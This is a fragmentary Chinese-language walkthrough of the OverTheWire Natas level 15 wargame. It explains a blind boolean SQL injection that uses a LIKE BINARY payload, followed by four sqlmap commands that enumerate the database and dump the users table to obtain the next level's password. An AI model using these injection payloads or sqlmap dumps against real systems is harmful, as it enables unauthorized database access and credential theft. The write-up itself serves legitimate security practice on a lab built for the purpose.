natas15
natas16
得到 This user exists.
,嘗試其他如 natas15
等則得到 This user doesn't exist.
users
中存在欄位 password
,型態為 varchar(64)
natas16" AND password LIKE BINARY "{已知 + 猜測}%" #
作為注入的 payload,其中 LIKE
用在 WHERE
判斷符合指定 pattern 的資料,而 %
代表出現零、一或多次的任意字,i.e., 以特定英數組合作為開頭的字串是否存在 password
欄位中。等待些許時間後成功獲得下題的登入密碼
sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php" --string="This user exists" --auth-type Basic --auth-cred "natas15:密碼自行填入" --data "username=natas16*" -p username --charset "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" --level 5 --risk 3 --random-agent --batch
sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php" --string="This user exists" --auth-type Basic --auth-cred "natas15:密碼自行填入" --data "username=natas16*" -p username --charset "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" --level 5 --risk 3 --random-agent --batch --dbs
sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php" --string="This user exists" --auth-type Basic --auth-cred "natas15:密碼自行填入" --data "username=natas16*" -p username --charset "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" --level 5 --risk 3 --random-agent --batch -D natas15 --tables
sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php" --string="This user exists" --auth-type Basic --auth-cred "natas15:密碼自行填入" --data "username=natas16*" -p username --charset "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" --level 5 --risk 3 --random-agent --batch -D natas15 -T users --dump